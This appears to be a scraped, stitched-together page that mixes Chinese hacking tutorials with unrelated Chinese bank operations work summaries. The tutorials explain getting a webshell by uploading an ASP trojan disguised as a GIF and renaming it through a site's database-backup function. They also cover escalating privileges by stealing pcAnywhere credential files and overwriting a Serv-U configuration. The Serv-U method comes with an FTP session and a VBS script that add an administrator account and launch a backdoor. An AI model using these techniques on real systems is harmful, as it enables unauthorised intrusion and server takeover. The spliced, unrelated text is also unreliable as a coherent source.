获得网站WEBSHELL权限 一、学习目标：在得到了管理员帐号的情况下，进入网站的管理员后台，以备份数据库得到WEBSEHLL。 二、知识要点：在入侵网站之前，信息搜集是第一步，任何情况的搜集，当情况搜集有初步成果之后，应该首先试图获得管理员的帐号和密码，然后找出网站的后台（看管理员在后台的什么地方），对于现成的整站系统而言，通常后台是固定的，只要搞到网站就能以管理员的帐号进入。进了后台，就有了能力对网站进行操作，我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL，也就是一个脚本，这个脚本，具有可以管理WEB、修改主页内容的权限，如果要修改别人的主页，一般都需要这个权限（上传漏洞要得到的也是这个权限）。它可对网站的任何文件进行编辑，移动，复制，删除。如果某个服务器权限设置得不好，那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限，并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后，获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马，(之所以要把ASP的木马护展名由ASP改为GIF，是因为一般网站都有检测护展名，当检测到护展名为ASP时就不会允许上传)，上传之后，用备份数据库的办法，把GIF护展名，备份成为ASP护展名，然后连接备份后的ASP地址，就能打开你上传的ASP木马，一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址，在恢复地址里输入你要生成的ASP地文件的路径和文件名，然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.360docs.net/doc/3a13952804.html,/bbsxp1（之前已经通过某方法得到网站后台管理员的用户名、口令）。 （1）以管理员身份登录网站前台，如图1。 图1 （2）在图2界面中进入ACCESS数据库管理，并在图3界面中输入后台管理员密码完成登录。

银行运营部工作总结

银行运营部工作总结 篇一：银行运营部年度工作总结报告 时光飞逝，转眼我进入XX银行XX分行已经有半年多的时间了，银行工作岗位众多、卧虎藏龙，个个都本事非凡，取他人之长补己之短，是每个新人快速成长不断提高的保障。众多领导、各位师傅前辈无私的将自己的经验教训传授于我，使我在快速成长的路上少走了不少弯路，通过和他们持续的交流不断的修正自己的方向，我也得以努力的快乐成长。在这短暂又宝贵的半年时间中我先后在个贷管理部和分行运营部实习，银行的岗位众多最后在多方领导的安排照顾下，在运营部找到了专业对口，自己也非常满意和珍惜的运营核算工作。 在半年的工作实习中，我收获良多。 首先，在各位前辈的帮助和教导下，对银行运营条线的工作性质有了初步认知。运营条线工作量大，风险点较多，工作错不得，一次操作失误将会给银行的资金和声誉造成无法挽回的损失，因此对待这份工作要抱有敬畏之心，不敢有半分的倦怠和随意。核算中心虽然不直接和客户打交道，但在后台的操作中会对客户资金起举足轻重的作用，例如在对待资金落地的处理上若有一刻怠慢就会造成汇路的不畅通，给XX银行的客户造成不必要的麻烦。因此对待在核算中心的工作还要有时间意识，学会和时间赛跑，在出现类似资金

落地的情况时要在第一时间作出准确判断并予以解决。核算中心的工作还要求我们有极强的风险防控意识，妥善保管带有XX银行字样的业务印章及其他重控物件，工作中双人复核等等要求都让我意识到今后工作岗位的重要性。 其次，在XX的细心呵护下，在XX和XX的无私帮助下，我学习了一部分核算中心的工作要点和账务处理。包括大小额资金调缴同城银联打印报表装订传票等等，在学习中我见识到前辈对工作负责认真的态度和她们的专业素养，我渴望早日成为像她们那样优秀的核算中心员工。 最后，通过参与XX年底的全面对账和XX年一季度的重点对账工作，我对银企对账工作流程和重要性有了初步的了解。①银对账催收要善于于客户沟通。银对账的催收工作通常是通过电话与企业财务人员取得联系的，没有面对面的接触，如何让客户接受我的工作，并配合我完成上银行的对账点击这着实让我下了一些功夫。我认为首先语音要柔和，通过亲和力取得客户的信任。其次是发送准确的指令，譬如在实际工作中我发现给客户说“尽快点击”往往没有明显的效果，而通知客户“我行现在正在集中办理银对账工作，需要在两个工作日中完成操作”则明确向客户传达出来两个工作日的时间要求，帮助客户尽快完成银的点击，达到了比较好的效果。最后当然就是一而再再而三的“轰炸式”催收了，这对于那些不是特别愿意配合的客户还是取得了一定的效

九种经典的Webshell提权

说到花了九牛二虎的力气获得了一个webshell， 当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～ 嘻嘻～～好跟我来，看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端，管理员为了管理方便 也给了我们方便，到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里， 那么就会用到ftp，服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写～ 好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖，启动servu添加了一个用户，设置为系统管理员，目录C:\，具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接～ 好的，还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限，那我们就 把后门（server.exe）传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)

银行运营管理工作总结

中国农业银行运营管理工作总结 今年，我行运营管理工作在市分行党委的正确领导和省分行业务主管部门的精心指导下，认真贯彻落实年初工作会议精神，围绕“三大集中”，加快实施“集中授权、集中作业、集中配送、集中对账”工作，积极组建运营管理组织体系，实施业务流程再造，夯实运营管理基础，不断强化运营业务操作风险管控，进一步优化网点作业流程，规范操作，把内控管理各项制度真正落到实处，运营管理水平得到进一步的提升，会计内控管理能力得到进一步加强，为我行稳健经营、持续发展保驾护航，确保无案件事故发生。现将全年工作开展情况总结如下： 一、工作目标完成情况 （一）后台中心建设取得突破性进展。截至年末，建成了市分行集中作业中心、远程集中授权中心。在全行初步搭建了前后台分离、后台集中的作业模式，减少了客户等待时间，降低网点柜员的营运作业压力，标志着我行柜面业务流程再造工作取得了实质性进展，临柜业务处理正式迈入一个新的时代，我行的现代化运营体系建设工作进入了高速发展阶段。 （二）现金中心集约化服务效果显著。完成了市分行现金中心功能分区改造，并顺利通过省分行验收，现金中心的功能得到进一步完善，对遂宁城区的离行式ATM机实现了集中加钞，现金调拨系统运行规范，现金集中清分、

现金与重空凭证集中配送运作规范有效，柜面人员减负作用显著，切实提高了对网点作业的支持保障与服务能力。 （三）运营业务基础管理持续夯实。一是建立健全运营业务规章制度，坚持质量控制、风险管理和考核评价多策并举，制定和完善了《监管员履职管理考核办法》、《运营主管履职考核办法》、《柜员星级管理办法》、《集中对账管理考核办法》、《运营业务考评实施细则》等制度。二是推行运营作业季度分析例会制度，各级行召开运营风险分析例会20次，16名监管人员深入到46个营业机构进行“坐班体验”。三是组织各种培训16期，共2316人（次）参加培训。 （四）运营操作风险管理水平持续提升。市县行共对220个次机构实施了尽职监管检查，尽职检查频率达到100%；组织开展财政账户、支付结算、定期存款、对账管理、印押证管理等专项检查。实现了全年无运营操作案件和重大差错事故的目标。 二、主要工作措施 （一）大力推进“三大集中”建设，后台集中成效逐步显现。 今年，我行为响应上级行对运营工作大集中的有关政策，认真贯彻执行省分行的战略部署，投入大量的人力、财力和物力，为积极推进运营体系各项集中任务的快速落实做了大量的尝试和富有成效的工作。